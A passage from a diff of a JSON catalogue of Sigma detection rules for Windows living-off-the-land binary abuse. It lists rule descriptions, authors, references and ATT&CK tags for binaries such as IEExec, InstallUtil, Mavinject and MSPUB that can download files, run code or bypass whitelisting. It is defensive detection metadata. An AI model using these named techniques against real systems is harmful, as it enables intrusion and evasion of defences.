files later.", + "meta": { + "author": "Sreeman, Florian Roth, Frack113", + "creation_date": "2020/04/21", + "falsepositive": [ + "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." + ], + "filename": "proc_creation_win_lolbin_execution_via_winget.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", + "value": "Monitoring Winget For LOLbin Execution" + }, + { + "description": "Extexport.exe loads dll and is execute from other folder the original path", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extexport.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "value": "Suspicious Extexport Execution" + }, + { + "description": "Download or Copy file with Extrac32", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extrac32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", + "value": "Suspicious Extrac32 Execution" + }, + { + "description": "Extract data from cab file and hide it in an alternate data stream", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extrac32_ads.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "value": "Suspicious Extrac32 Alternate Data Stream Execution" + }, + { + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrative findstr usage" + ], + "filename": "proc_creation_win_lolbin_findstr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" + ] + }, + "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "value": "Abusing Findstr for Defense Evasion" + }, + { + "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "filename": "proc_creation_win_lolbin_forfiles.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "value": "Use of Forfiles For Execution" + }, + { + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/02", + "falsepositive": [ + "Legitimate use by a software developer." + ], + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", + "value": "Use of FSharp Interpreters" + }, + { + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "value": "LOLBIN Execution Of The FTP.EXE Binary" + }, + { + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Legitimate uses of logon scripts distributed via group policy" + ], + "filename": "proc_creation_win_lolbin_gpscript.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "1e59c230-6670-45bf-83b0-98903780607e", + "value": "Gpscript Execution" + }, + { + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "meta": { + "author": "frack113", + "creation_date": "2022/05/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ie4uinit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", + "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "value": "Ie4uinit Lolbin Use From Invalid Path" + }, + { + "description": "Detects execution of the IEExec utility to download payloads", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" + ], + "tags": "No established tags" + }, + "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "value": "Abusing IEExec To Download Payloads" + }, + { + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ilasm.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", + "https://www.echotrail.io/insights/search/ilasm.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "value": "Ilasm Lolbin Use Compile C-Sharp" + }, + { + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_installutil_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "value": "Suspicious Execution of InstallUtil To Download" + }, + { + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "meta": { + "author": "frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_jsc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "value": "JSC Convert Javascript To Executable" + }, + { + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_kavremover.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "value": "Kavremover Dropped Binary LOLBIN Usage" + }, + { + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate usage of the script by a developer" + ], + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535981653239255040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ] + }, + "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", + "value": "Launch-VsDevShell.PS1 Proxy Execution" + }, + { + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2021/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ] + }, + "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "value": "Mavinject Inject DLL Into Running Process" + }, + { + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate use for tracing purposes" + ], + "filename": "proc_creation_win_lolbin_mftrace.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "value": "Use of Mftrace.exe" + }, + { + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/13", + "falsepositive": [ + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + ], + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "value": "Execute MSDT Via Answer File" + }, + { + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_msohtmed_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "value": "Download Arbitrary Files Via MSOHTMED.EXE" + }, + { + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_mspub_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "value": "Download Arbitrary Files Via MSPUB.EXE" + }, + { + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2022/01/25", + "falsepositive": [ + "Rare false positives could occur on servers with multiple drives." + ], + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://www.scythe.io/library/threat-emulation-qakbot", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" + ], + "tags": [ + "attack.t1218.001" + ] + }, + "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "value": "LOLBIN From Abnormal Drive" + }, + { + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "meta": { + "author": "frack113", + "creation_date": "2022/03/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_offlinescannershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", + "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder" + }, + { + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/16", + "falsepositive": [ + "Legitimate use by an administrator" + ], + "filename": "proc_creation_win_lolbin_openconsole.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1537563834478645252", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", + "value": "Use of OpenConsole" + }, + { + "description": "Execute commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This is used as a LOLBIN for example to bypass application whitelisting.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "filename": "proc_creation_win_lolbin_pcalua.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "value": "Use of Pcalua For Execution" + }, + { + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "meta": { + "author": "A. Sungurov , oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" + ], + "filename": "proc_creation_win_lolbin_pcwrun.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/991335019833708544", + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "value": "Indirect Command Execution By Program Compatibility Wizard" + }, + { + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/13", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535663791362519040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", + "value": "Execute Pcwrun.EXE To Leverage Follina" + }, + { + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_lolbin_pktmon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "value": "Use of PktMon.exe" + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/01", + "falsepositive": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "filename": "proc_creation_win_lolbin_presentationhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "value": "Application Whitelisting Bypass via PresentationHost.exe" + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_presentationhost_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "value": "Download Arbitrary Files Via PresentationHost.exe" + }, + { + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_printbrm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "value": "PrintBrm ZIP Creation of Extraction" + }, + { + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_pubprn.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ] + }, + "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "value": "Pubprn.vbs Proxy Execution" + }, + { + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", + "https://github.com/fireeye/DueDLLigence", + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", + "value": "DLL Execution via Rasautou.exe" + }, + { + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_regasm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fortiguard.com/threat-signal-report/4718?s=09", + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.009" + ] + }, + "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", + "value": "Regasm/Regsvcs Suspicious Execution" + }, + { + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + ], + "filename": "proc_creation_win_lolbin_register_app.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", + "value": "REGISTER_APP.VBS Proxy Execution" + }, + { + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/02", + "falsepositive": [ + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." + ], + "filename": "proc_creation_win_lolbin_remote.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "value": "Use of Remote.exe" + }, + { + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "meta": { + "author": "frack113", + "creation_date": "2022/03/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_replace.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Replace/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", + "value": "Replace.exe Usage" + }, + { + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "creation_date": "2022/04/28", + "falsepositive": [ + "Legitimate installation of a new screensaver" + ], + 